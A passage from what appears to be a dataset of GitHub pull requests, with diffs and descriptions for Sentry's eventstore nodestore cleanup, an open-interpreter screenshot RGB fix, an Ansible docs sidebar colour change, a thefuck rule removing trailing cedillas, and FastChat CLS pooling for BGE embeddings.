from sentry.api.exceptions import ResourceDoesNotExist
from sentry.grouping.api import GroupingConfigNotFound
@@ -24,9 +24,6 @@ def get(self, request, project, event_id):
if event is None:
raise ResourceDoesNotExist
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
rv = {}
config_name = request.GET.get("config") or None
diff --git a/src/sentry/api/endpoints/event_owners.py b/src/sentry/api/endpoints/event_owners.py
index cac75bdc42ec1f..9007a6b0da4e81 100644
--- a/src/sentry/api/endpoints/event_owners.py
+++ b/src/sentry/api/endpoints/event_owners.py
@@ -3,7 +3,7 @@
import six
from rest_framework.response import Response
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.fields.actor import Actor
from sentry.api.serializers import serialize
@@ -26,10 +26,6 @@ def get(self, request, project, event_id):
if event is None:
return Response({"detail": "Event not found"}, status=404)
- # populate event data
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
owners, rules = ProjectOwnership.get_owners(project.id, event.data)
# For sake of the API, we don't differentiate between
diff --git a/src/sentry/api/endpoints/project_group_index.py b/src/sentry/api/endpoints/project_group_index.py
index 2eaab4fb98a1f5..cf4ab33cd60a13 100644
--- a/src/sentry/api/endpoints/project_group_index.py
+++ b/src/sentry/api/endpoints/project_group_index.py
@@ -5,7 +5,7 @@
import six
from rest_framework.response import Response
-from sentry import analytics, eventstore, options, search
+from sentry import analytics, eventstore, search
from sentry.api.base import DocSection, EnvironmentMixin
from sentry.api.bases.project import ProjectEndpoint, ProjectEventPermission
from sentry.api.helpers.group_index import (
@@ -151,9 +151,6 @@ def get(self, request, project):
pass
else:
matching_event = eventstore.get_event_by_id(project.id, event_id)
- if matching_event is not None:
- if not options.get("eventstore.use-nodestore"):
- matching_event.bind_node_data()
elif matching_group is None:
matching_group = get_by_short_id(
project.organization_id, request.GET.get("shortIdLookup"), query
diff --git a/src/sentry/eventstore/base.py b/src/sentry/eventstore/base.py
index 438f8a60e96266..aafa80384aae5d 100644
--- a/src/sentry/eventstore/base.py
+++ b/src/sentry/eventstore/base.py
@@ -117,14 +117,13 @@ def get_events(
"""
raise NotImplementedError
- def get_event_by_id(self, project_id, event_id, additional_columns=None):
+ def get_event_by_id(self, project_id, event_id):
"""
Gets a single event given a project_id and event_id.
Arguments:
project_id (int): Project ID
event_id (str): Event ID
- additional_columns: (Sequence[Column]) - List of addition columns to fetch - default None
"""
raise NotImplementedError
diff --git a/src/sentry/eventstore/snuba/backend.py b/src/sentry/eventstore/snuba/backend.py
index 2d786fdcdbade9..5c0a18515673bd 100644
--- a/src/sentry/eventstore/snuba/backend.py
+++ b/src/sentry/eventstore/snuba/backend.py
@@ -5,7 +5,6 @@
from copy import deepcopy
from datetime import datetime, timedelta
-from sentry import options
from sentry.eventstore.base import EventStorage
from sentry.snuba.events import Columns
from sentry.utils import snuba
@@ -76,7 +75,7 @@ def get_events(
return []
- def get_event_by_id(self, project_id, event_id, additional_columns=None):
+ def get_event_by_id(self, project_id, event_id):
"""
Get an event given a project ID and event ID
Returns None if an event cannot be found
@@ -86,22 +85,6 @@ def get_event_by_id(self, project_id, event_id, additional_columns=None):
if not event_id:
return None
- if options.get("eventstore.use-nodestore"):
- return self.__get_event_by_id_nodestore(project_id, event_id)
-
- cols = self.__get_columns(additional_columns)
-
- result = snuba.raw_query(
- selected_columns=cols,
- filter_keys={"event_id": [event_id], "project_id": [project_id]},
- referrer="eventstore.get_event_by_id",
- limit=1,
- )
- if "error" not in result and len(result["data"]) == 1:
- return self.__make_event(result["data"][0])
- return None
-
- def __get_event_by_id_nodestore(self, project_id, event_id):
event = Event(project_id=project_id, event_id=event_id)
event.bind_node_data()
diff --git a/src/sentry/integrations/issues.py b/src/sentry/integrations/issues.py
index a1e15e43473128..d49c11992553ab 100644
--- a/src/sentry/integrations/issues.py
+++ b/src/sentry/integrations/issues.py
@@ -3,7 +3,7 @@
import logging
import six
-from sentry import features, options
+from sentry import features
from sentry.integrations.exceptions import ApiError, IntegrationError
from sentry.models import Activity, ExternalIssue, Group, GroupLink, GroupStatus, Organization
from sentry.utils.http import absolute_uri
@@ -58,9 +58,6 @@ def get_create_issue_config(self, group, **kwargs):
in Jira, VSTS, GitHub, etc
"""
event = group.get_latest_event()
- if event is not None:
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
return [
{
diff --git a/src/sentry/web/frontend/error_page_embed.py b/src/sentry/web/frontend/error_page_embed.py
index 33359f931712ad..936f736eefa93f 100644
--- a/src/sentry/web/frontend/error_page_embed.py
+++ b/src/sentry/web/frontend/error_page_embed.py
@@ -152,8 +152,6 @@ def dispatch(self, request):
event = eventstore.get_event_by_id(report.project.id, report.event_id)
if event is not None:
- if not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
report.environment = event.get_environment()
report.group = event.group
diff --git a/src/sentry/web/frontend/group_event_json.py b/src/sentry/web/frontend/group_event_json.py
index 34c608872f4e0b..33c18d3c5d960c 100644
--- a/src/sentry/web/frontend/group_event_json.py
+++ b/src/sentry/web/frontend/group_event_json.py
@@ -2,7 +2,7 @@
from django.http import Http404, HttpResponse
-from sentry import eventstore, options
+from sentry import eventstore
from sentry.models import Group, GroupMeta, get_group_with_redirect
from sentry.utils import json
@@ -28,9 +28,6 @@ def get(self, request, organization, group_id, event_id_or_latest):
if event is None:
raise Http404
- if event_id_or_latest != "latest" and not options.get("eventstore.use-nodestore"):
- event.bind_node_data()
-
GroupMeta.objects.populate_cache([group])
return HttpResponse(json.dumps(event.as_dict()), content_type="application/json")
diff --git a/tests/integration/tests.py b/tests/integration/tests.py
index a34553686a3e40..467e69a5e89046 100644
--- a/tests/integration/tests.py
+++ b/tests/integration/tests.py
@@ -176,7 +176,7 @@ def path(self):
return reverse("sentry-api-store")
def get_event(self, event_id):
- instance = eventstore.get_event_by_id(self.project.id, event_id, eventstore.full_columns)
+ instance = eventstore.get_event_by_id(self.project.id, event_id)
instance.bind_node_data()
return instance
diff --git a/tests/sentry/eventstore/snuba/test_backend.py b/tests/sentry/eventstore/snuba/test_backend.py
index efecdfdf77494c..8ce93fbe7b0347 100644
--- a/tests/sentry/eventstore/snuba/test_backend.py
+++ b/tests/sentry/eventstore/snuba/test_backend.py
@@ -3,8 +3,6 @@
import six
import pytest
-from django.conf import settings
-
from sentry.testutils import TestCase, SnubaTestCase
from sentry.testutils.helpers.datetime import iso_format, before_now
from sentry.eventstore.snuba.backend import SnubaEventStorage
@@ -90,21 +88,13 @@ def test_get_events(self):
assert events == []
def test_get_event_by_id(self):
- # Get event with default columns
+ # Get valid event
event = self.eventstore.get_event_by_id(self.project1.id, "a" * 32)
assert event.id == "a" * 32
assert event.event_id == "a" * 32
assert event.project_id == self.project1.id
- # Get all columns
- event = self.eventstore.get_event_by_id(
- self.project2.id, "b" * 32, self.eventstore.full_columns
- )
- assert event.id == "b" * 32
- assert event.event_id == "b" * 32
- assert event.project_id == self.project2.id
-
# Get non existent event
event = self.eventstore.get_event_by_id(self.project2.id, "f" * 32)
assert event is None
@@ -117,22 +107,19 @@ def test_get_event_by_id(self):
assert event.project_id == self.project2.id
def test_get_event_by_id_nodestore(self):
- options = settings.SENTRY_OPTIONS.copy()
- options["eventstore.use-nodestore"] = True
- with self.settings(SENTRY_OPTIONS=options):
- event = self.eventstore.get_event_by_id(self.project1.id, "a" * 32)
- assert event
- assert event.group_id == event.group.id
-
- # Transaction event
- event = self.eventstore.get_event_by_id(self.project2.id, "d" * 32)
- assert event
- assert not event.group_id
- assert not event.group
-
- # Non existent event
- event = self.eventstore.get_event_by_id(self.project.id, "f" * 32)
- assert not event
+ event = self.eventstore.get_event_by_id(self.project1.id, "a" * 32)
+ assert event
+ assert event.group_id == event.group.id
+
+ # Transaction event
+ event = self.eventstore.get_event_by_id(self.project2.id, "d" * 32)
+ assert event
+ assert not event.group_id
+ assert not event.group
+
+ # Non existent event
+ event = self.eventstore.get_event_by_id(self.project.id, "f" * 32)
+ assert not event
def test_get_next_prev_event_id(self):
event = self.eventstore.get_event_by_id(self.project2.id, "b" * 32)
| This feature has been rolled out in production, and we are now fetching
from Nodestore instead of Snuba. We don't want to keep this option
anymore. | https://api.github.com/repos/getsentry/sentry/pulls/16421 | 2020-01-13T21:00:44Z | 2020-01-15T18:32:56Z | 2020-01-15T18:32:56Z | 2020-12-19T14:52:28Z | 3,286 | getsentry/sentry | 44,246 |
Fix cli crash during screenshot generation | diff --git a/interpreter/core/computer/display/display.py b/interpreter/core/computer/display/display.py
index f34ea39d4..724bcbf35 100644
--- a/interpreter/core/computer/display/display.py
+++ b/interpreter/core/computer/display/display.py
@@ -1,15 +1,11 @@
import base64
-import os
import pprint
-import subprocess
-import tempfile
import time
import warnings
from io import BytesIO
import matplotlib.pyplot as plt
import requests
-from PIL import Image
from ..utils.recipient_utils import format_to_recipient
@@ -17,7 +13,6 @@
# from utils.get_active_window import get_active_window
try:
- import cv2
import numpy as np
import pyautogui
except:
@@ -70,8 +65,6 @@ def screenshot(self, show=True, quadrant=None, active_app_only=False):
)
return
- temp_file = tempfile.NamedTemporaryFile(suffix=".png", delete=False)
-
if quadrant == None:
# Implement active_app_only!
if active_app_only:
@@ -103,30 +96,20 @@ def screenshot(self, show=True, quadrant=None, active_app_only=False):
else:
raise ValueError("Invalid quadrant. Choose between 1 and 4.")
- screenshot.save(temp_file.name)
-
# Open the image file with PIL
- img = Image.open(temp_file.name)
-
- # Delete the temporary file
- try:
- os.remove(temp_file.name)
- except Exception as e:
- # On windows, this can fail due to permissions stuff??
- # (PermissionError: [WinError 32] The process cannot access the file because it is being used by another process: 'C:\\Users\\killi\\AppData\\Local\\Temp\\tmpgc2wscpi.png')
- if self.computer.verbose:
- print(str(e))
+ # IPython interactive mode auto-displays plots, causing RGBA handling issues, possibly MacOS-specific.
+ screenshot = screenshot.convert("RGB")
if show:
# Show the image using matplotlib
- plt.imshow(np.array(img))
+ plt.imshow(np.array(screenshot))
with warnings.catch_warnings():
# It displays an annoying message about Agg not being able to display something or WHATEVER
warnings.simplefilter("ignore")
plt.show()
- return img
+ return screenshot
def find_text(self, text, screenshot=None):
# Take a screenshot
| ### Describe the changes you have made:
### Description of changes:
Implemented a fix that addresses an RGBA handling issue during screenshot generation when using IPython with auto-display.
The issue happens because `show=True` is set in `Display.snapshot`, and the screenshot generated on a Mac has an alpha channel (RGBA instead of RGB). When IPython attempts to display this image and convert it to JPEG, the process crashes (the exact cause is unclear).
This PR introduces a simple fix that enforces RGB mode in all cases.
I chose not to alter the default value of `show` because there may be use cases that depend on the current behavior, and this change is less likely to introduce new issues.
In the following commit, I performed a minor refactor related to the change I made: instead of saving/loading the image into a file that is neither used nor exposed, we now directly use the memory buffer. I separated this into another commit in case it causes any issues or if there are anticipated future uses for the file-based approach, making it easier to roll back or opt not to merge.
Thank you for the amazing project. ;)
### Reference any relevant issues (e.g. "Fixes #000"):
Fixes #878
### Pre-Submission Checklist (optional but appreciated):
- [ ] I have included relevant documentation updates (stored in /docs)
- [X] I have read `docs/CONTRIBUTING.md`
- [X] I have read `docs/ROADMAP.md`
### OS Tests (optional but appreciated):
- [ ] Tested on Windows
- [X] Tested on MacOS
- [ ] Tested on Linux
| https://api.github.com/repos/OpenInterpreter/open-interpreter/pulls/884 | 2024-01-08T04:35:18Z | 2024-01-09T04:42:03Z | 2024-01-09T04:42:03Z | 2024-01-09T04:42:04Z | 542 | OpenInterpreter/open-interpreter | 40,789 |
lighten navigation background to make section labels easier to read for core docs | diff --git a/docs/docsite/_static/core.css b/docs/docsite/_static/core.css
index 8fde5e01ad4e51..5a7b0a1717c54d 100644
--- a/docs/docsite/_static/core.css
+++ b/docs/docsite/_static/core.css
@@ -27,4 +27,4 @@ table.documentation-table .value-name {
font-weight: bold;
display: inline;
}
-*/table.documentation-table .value-type{font-size:x-small;color:purple;display:inline}table.documentation-table .value-separator{font-size:x-small;display:inline}table.documentation-table .value-required{font-size:x-small;color:red;display:inline}.value-added-in{font-size:x-small;font-style:italic;color:green;display:inline}/*! Ansible-specific CSS pulled out of rtd theme for 2.9 */.DocSiteProduct-header{flex:1;-webkit-flex:1;padding:10px 20px 20px;display:flex;display:-webkit-flex;flex-direction:column;-webkit-flex-direction:column;align-items:center;-webkit-align-items:center;justify-content:flex-start;-webkit-justify-content:flex-start;margin-left:20px;margin-right:20px;text-decoration:none;font-weight:400;font-family:"Open Sans",sans-serif}.DocSiteProduct-header:active,.DocSiteProduct-header:focus,.DocSiteProduct-header:visited{color:#fff}.DocSiteProduct-header--core{font-size:25px;background-color:#161b1f;border:2px solid #161b1f;border-top-left-radius:4px;border-top-right-radius:4px;color:#fff;padding-left:2px;margin-left:2px}.DocSiteProduct-headerAlign{width:100%}.DocSiteProduct-logo{width:60px;height:60px;margin-bottom:-9px}.DocSiteProduct-logoText{margin-top:6px;font-size:25px;text-align:left}.DocSiteProduct-CheckVersionPara{margin-left:2px;padding-bottom:4px;margin-right:2px;margin-bottom:10px}/*! Ansible color scheme */.wy-nav-top,.wy-side-nav-search{background-color:#161b1f}.wy-menu-vertical header,.wy-menu-vertical p.caption{color:#161b1f}.wy-menu-vertical a{padding:0}.wy-menu-vertical a.reference.internal{padding:.4045em 1.618em}/*! Override sphinx rtd theme max-with of 800px */.wy-nav-content{max-width:100%}/*! Override sphinx_rtd_theme - keeps left-nav from overwriting Documentation title */.wy-nav-side{top:45px}/*! Ansible - changed absolute to relative to remove extraneous side scroll bar */.wy-grid-for-nav{position:relative}/*! Ansible narrow the search box */.wy-side-nav-search input[type=text]{width:90%;padding-left:24px}/*! Ansible - remove so highlight indenting is correct */.rst-content .highlighted{padding:0}.DocSiteBanner{display:flex;display:-webkit-flex;justify-content:center;-webkit-justify-content:center;flex-wrap:wrap;-webkit-flex-wrap:wrap;margin-bottom:25px}.DocSiteBanner-imgWrapper{max-width:100%}td,th{min-width:100px}table{overflow-x:auto;display:block;max-width:100%}.documentation-table td.elbow-placeholder{border-left:1px solid #000;border-top:0;width:30px;min-width:30px}.documentation-table td,.documentation-table th{padding:4px;border-left:1px solid #000;border-top:1px solid #000}.documentation-table{border-right:1px solid #000;border-bottom:1px solid #000}@media print{*{background:0 0!important;color:#000!important;text-shadow:none!important;filter:none!important;-ms-filter:none!important}#nav,a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}/*! Don't show links for images, or javascript/internal links */pre,blockquote{border:0 solid #999;page-break-inside:avoid}thead{display:table-header-group}/*! h5bp.com/t */tr,img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:.5cm}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}#google_image_div,.DocSiteBanner{display:none!important}}#sideBanner,.DocSite-globalNav{display:none}.DocSite-sideNav{display:block;margin-bottom:40px}.DocSite-nav{display:none}.ansibleNav{background:#000;padding:0 20px;width:auto;border-bottom:1px solid #444;font-size:14px;z-index:1}.ansibleNav ul{list-style:none;padding-left:0;margin-top:0}.ansibleNav ul li{padding:7px 0;border-bottom:1px solid #444}.ansibleNav ul li:last-child{border:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:6px 0}.ansibleNav ul li a:hover{color:#161b1f;background:0 0}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}@media screen and (min-width:768px){.DocSite-globalNav{display:block;position:fixed}#sideBanner{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed;z-index:1}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px;z-index:1}.ansibleNav{height:45px;width:100%;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}@media screen and (min-width:768px){#sideBanner,.DocSite-globalNav{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px}.ansibleNav{height:45px;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}tr:hover .ansibleOptionLink::after{visibility:visible}tr .ansibleOptionLink::after{content:"";font-family:FontAwesome}tr .ansibleOptionLink{visibility:hidden;display:inline-block;font:normal normal normal 14px/1 FontAwesome;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media screen and (min-width:767px){section [id]{padding-top:45px;margin-top:-45px}section a[id]{padding-top:0;margin-top:0}}
+*/table.documentation-table .value-type{font-size:x-small;color:purple;display:inline}table.documentation-table .value-separator{font-size:x-small;display:inline}table.documentation-table .value-required{font-size:x-small;color:red;display:inline}.value-added-in{font-size:x-small;font-style:italic;color:green;display:inline}/*! Ansible-specific CSS pulled out of rtd theme for 2.9 */.DocSiteProduct-header{flex:1;-webkit-flex:1;padding:10px 20px 20px;display:flex;display:-webkit-flex;flex-direction:column;-webkit-flex-direction:column;align-items:center;-webkit-align-items:center;justify-content:flex-start;-webkit-justify-content:flex-start;margin-left:20px;margin-right:20px;text-decoration:none;font-weight:400;font-family:"Open Sans",sans-serif}.DocSiteProduct-header:active,.DocSiteProduct-header:focus,.DocSiteProduct-header:visited{color:#fff}.DocSiteProduct-header--core{font-size:25px;background-color:#161b1f;border:2px solid #161b1f;border-top-left-radius:4px;border-top-right-radius:4px;color:#fff;padding-left:2px;margin-left:2px}.DocSiteProduct-headerAlign{width:100%}.DocSiteProduct-logo{width:60px;height:60px;margin-bottom:-9px}.DocSiteProduct-logoText{margin-top:6px;font-size:25px;text-align:left}.DocSiteProduct-CheckVersionPara{margin-left:2px;padding-bottom:4px;margin-right:2px;margin-bottom:10px}/*! Ansible color scheme */.wy-nav-top,.wy-side-nav-search{background-color:#161b1f}.wy-menu-vertical header,.wy-menu-vertical p.caption{color:#161b1f}.wy-menu-vertical a{padding:0}.wy-menu-vertical a.reference.internal{padding:.4045em 1.618em}/*! Override sphinx rtd theme max-with of 800px */.wy-nav-content{max-width:100%}/*! Override sphinx_rtd_theme - keeps left-nav from overwriting Documentation title */.wy-nav-side{top:45px;background:#999}/*! Ansible - changed absolute to relative to remove extraneous side scroll bar */.wy-grid-for-nav{position:relative}/*! Ansible narrow the search box */.wy-side-nav-search input[type=text]{width:90%;padding-left:24px}/*! Ansible - remove so highlight indenting is correct */.rst-content .highlighted{padding:0}.DocSiteBanner{display:flex;display:-webkit-flex;justify-content:center;-webkit-justify-content:center;flex-wrap:wrap;-webkit-flex-wrap:wrap;margin-bottom:25px}.DocSiteBanner-imgWrapper{max-width:100%}td,th{min-width:100px}table{overflow-x:auto;display:block;max-width:100%}.documentation-table td.elbow-placeholder{border-left:1px solid #000;border-top:0;width:30px;min-width:30px}.documentation-table td,.documentation-table th{padding:4px;border-left:1px solid #000;border-top:1px solid #000}.documentation-table{border-right:1px solid #000;border-bottom:1px solid #000}@media print{*{background:0 0!important;color:#000!important;text-shadow:none!important;filter:none!important;-ms-filter:none!important}#nav,a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}abbr[title]:after{content:" (" attr(title) ")"}.ir a:after,a[href^="javascript:"]:after,a[href^="#"]:after{content:""}/*! Don't show links for images, or javascript/internal links */pre,blockquote{border:0 solid #999;page-break-inside:avoid}thead{display:table-header-group}/*! h5bp.com/t */tr,img{page-break-inside:avoid}img{max-width:100%!important}@page{margin:.5cm}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}#google_image_div,.DocSiteBanner{display:none!important}}#sideBanner,.DocSite-globalNav{display:none}.DocSite-sideNav{display:block;margin-bottom:40px}.DocSite-nav{display:none}.ansibleNav{background:#000;padding:0 20px;width:auto;border-bottom:1px solid #444;font-size:14px;z-index:1}.ansibleNav ul{list-style:none;padding-left:0;margin-top:0}.ansibleNav ul li{padding:7px 0;border-bottom:1px solid #444}.ansibleNav ul li:last-child{border:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:6px 0}.ansibleNav ul li a:hover{color:#161b1f;background:0 0}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}@media screen and (min-width:768px){.DocSite-globalNav{display:block;position:fixed}#sideBanner{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed;z-index:1}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px;z-index:1}.ansibleNav{height:45px;width:100%;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}@media screen and (min-width:768px){#sideBanner,.DocSite-globalNav{display:block}.DocSite-sideNav{display:none}.DocSite-nav{flex:initial;-webkit-flex:initial;display:flex;display:-webkit-flex;flex-direction:row;-webkit-flex-direction:row;justify-content:flex-start;-webkit-justify-content:flex-start;padding:15px;background-color:#000;text-decoration:none;font-family:"Open Sans",sans-serif}.DocSiteNav-logo{width:28px;height:28px;margin-right:8px;margin-top:-6px;position:fixed}.DocSiteNav-title{color:#fff;font-size:20px;position:fixed;margin-left:40px;margin-top:-4px}.ansibleNav{height:45px;font-size:13px;padding:0 60px 0 0}.ansibleNav ul{float:right;display:flex;flex-wrap:nowrap;margin-top:13px}.ansibleNav ul li{padding:0;border-bottom:none}.ansibleNav ul li a{color:#fff;text-decoration:none;text-transform:uppercase;padding:8px 13px}h4{font-size:105%}h5{font-size:90%}h6{font-size:80%}}tr:hover .ansibleOptionLink::after{visibility:visible}tr .ansibleOptionLink::after{content:"";font-family:FontAwesome}tr .ansibleOptionLink{visibility:hidden;display:inline-block;font:normal normal normal 14px/1 FontAwesome;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media screen and (min-width:767px){section [id]{padding-top:45px;margin-top:-45px}section a[id]{padding-top:0;margin-top:0}}
| ##### SUMMARY
<!--- Describe the change below, including rationale and design decisions -->
<!--- HINT: Include "Fixes #nnn" if you are fixing an existing issue -->
updated core.css to lighten the left-hand navigation background to make section headings easier to see.
Since the diffs are hard to read in a minified css, This PR adds the background value below:
wy-nav-side{top:45px;background:#999}
##### ISSUE TYPE
<!--- Pick one below and delete the rest -->
- Docs Pull Request
##### COMPONENT NAME
<!--- Write the short name of the module, plugin, task or feature below -->
docs/docsite/_static/core.css
##### ADDITIONAL INFORMATION
<!--- Include additional information to help people understand the change here -->
<!--- A step-by-step reproduction of the problem is helpful if there is no related issue -->
<!--- Paste verbatim command output below, e.g. before and after your change -->
```paste below
```
| https://api.github.com/repos/ansible/ansible/pulls/74356 | 2021-04-20T20:14:42Z | 2021-04-22T18:54:27Z | 2021-04-22T18:54:27Z | 2021-06-24T14:59:17Z | 3,499 | ansible/ansible | 49,115 |
Custom rule: Remove trailing cedillas | diff --git a/README.md b/README.md
index 254f2b2be..14984fdc3 100644
--- a/README.md
+++ b/README.md
@@ -215,6 +215,7 @@ using the matched rule and runs it. Rules enabled by default are as follows:
* `python_execute` – appends missing `.py` when executing Python files;
* `quotation_marks` – fixes uneven usage of `'` and `"` when containing args';
* `react_native_command_unrecognized` – fixes unrecognized `react-native` commands;
+* `remove_trailing_cedilla` – remove trailling cedillas `ç`, a common typo for european keyboard layouts;
* `rm_dir` – adds `-rf` when you trying to remove directory;
* `sed_unterminated_s` – adds missing '/' to `sed`'s `s` commands;
* `sl_ls` – changes `sl` to `ls`;
diff --git a/tests/rules/test_remove_trailing_cedilla.py b/tests/rules/test_remove_trailing_cedilla.py
new file mode 100644
index 000000000..377ff8fc7
--- /dev/null
+++ b/tests/rules/test_remove_trailing_cedilla.py
@@ -0,0 +1,15 @@
+import pytest
+from thefuck.rules.remove_trailing_cedilla import match, get_new_command, CEDILLA
+from tests.utils import Command
+
+@pytest.mark.parametrize('command', [
+ Command(script='wrong' + CEDILLA),
+ Command(script='wrong with args' + CEDILLA)])
+def test_match(command):
+ assert match(command)
+
+@pytest.mark.parametrize('command, new_command', [
+ (Command('wrong' + CEDILLA), 'wrong'),
+ (Command('wrong with args' + CEDILLA), 'wrong with args')])
+def test_get_new_command(command, new_command):
+ assert get_new_command(command) == new_command
diff --git a/thefuck/rules/remove_trailing_cedilla.py b/thefuck/rules/remove_trailing_cedilla.py
new file mode 100644
index 000000000..311864486
--- /dev/null
+++ b/thefuck/rules/remove_trailing_cedilla.py
@@ -0,0 +1,9 @@
+# encoding=utf8
+
+CEDILLA = u"ç"
+
+def match(command):
+ return command.script.endswith(CEDILLA)
+
+def get_new_command(command):
+ return command.script[:-1]
| ### Summary
Many programmers use european keyboards, like this one:

Some users (like me), have some fat-brute-fingers, and, when pressing the `enter` key, we also press that tedious `ç` key. I've created this new rule to fix those typos.
### Features
- [x] Create a new rule to match those cases, and fix them.
- [x] Create a new test.
### Questions
- Should the priority be changed to a lower value?
### References
- [Cedilla in Wikipedia](https://en.wikipedia.org/wiki/Cedilla)
- [Keyboard layouts in Wikipedia](https://en.wikipedia.org/wiki/Keyboard_layout)
| https://api.github.com/repos/nvbn/thefuck/pulls/552 | 2016-09-29T10:00:31Z | 2016-10-02T15:19:49Z | 2016-10-02T15:19:49Z | 2016-10-02T15:19:54Z | 568 | nvbn/thefuck | 30,559 |
Fix the pooling method of BGE embedding model | diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index bb268e093e..2a2797bfdb 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -1702,6 +1702,8 @@ def load_model(self, model_path: str, from_pretrained_kwargs: dict):
model.config.max_sequence_length = min(
model.config.max_position_embeddings, tokenizer.model_max_length
)
+ model.use_cls_pooling = True
+ model.eval()
return model, tokenizer
def get_default_conv_template(self, model_path: str) -> Conversation:
diff --git a/fastchat/serve/model_worker.py b/fastchat/serve/model_worker.py
index dac6ac8b42..683a78556d 100644
--- a/fastchat/serve/model_worker.py
+++ b/fastchat/serve/model_worker.py
@@ -164,9 +164,13 @@ def __process_embed_chunk(self, input_ids, attention_mask, **model_type_dict):
data = model_output.hidden_states[-1].transpose(0, 1)
else:
data = model_output.hidden_states[-1]
- mask = attention_mask.unsqueeze(-1).expand(data.size()).float()
- masked_embeddings = data * mask
- sum_embeddings = torch.sum(masked_embeddings, dim=1)
+
+ if hasattr(self.model, "use_cls_pooling") and self.model.use_cls_pooling:
+ sum_embeddings = data[:, 0]
+ else:
+ mask = attention_mask.unsqueeze(-1).expand(data.size()).float()
+ masked_embeddings = data * mask
+ sum_embeddings = torch.sum(masked_embeddings, dim=1)
token_num = torch.sum(attention_mask).item()
return sum_embeddings, token_num
@@ -211,10 +215,14 @@ def get_embeddings(self, params):
base64_encode = params.get("encoding_format", None)
if self.embed_in_truncate:
- chunk_embeddings, token_num = self.__process_embed_chunk(
+ embedding, token_num = self.__process_embed_chunk(
input_ids, attention_mask, **model_type_dict
)
- embedding = chunk_embeddings / token_num
+ if (
+ not hasattr(self.model, "use_cls_pooling")
+ or not self.model.use_cls_pooling
+ ):
+ embedding = embedding / token_num
normalized_embeddings = F.normalize(embedding, p=2, dim=1)
ret["token_num"] = token_num
else:
@@ -224,10 +232,41 @@ def get_embeddings(self, params):
chunk_input_ids = input_ids[:, i : i + self.context_len]
chunk_attention_mask = attention_mask[:, i : i + self.context_len]
+ # add cls token and mask to get cls embedding
+ if (
+ hasattr(self.model, "use_cls_pooling")
+ and self.model.use_cls_pooling
+ ):
+ cls_tokens = (
+ torch.zeros(
+ (chunk_input_ids.size(0), 1),
+ dtype=chunk_input_ids.dtype,
+ device=chunk_input_ids.device,
+ )
+ + tokenizer.cls_token_id
+ )
+ chunk_input_ids = torch.cat(
+ [cls_tokens, chunk_input_ids], dim=-1
+ )
+ mask = torch.ones(
+ (chunk_attention_mask.size(0), 1),
+ dtype=chunk_attention_mask.dtype,
+ device=chunk_attention_mask.device,
+ )
+ chunk_attention_mask = torch.cat(
+ [mask, chunk_attention_mask], dim=-1
+ )
+
chunk_embeddings, token_num = self.__process_embed_chunk(
chunk_input_ids, chunk_attention_mask, **model_type_dict
)
- all_embeddings.append(chunk_embeddings)
+ if (
+ hasattr(self.model, "use_cls_pooling")
+ and self.model.use_cls_pooling
+ ):
+ all_embeddings.append(chunk_embeddings * token_num)
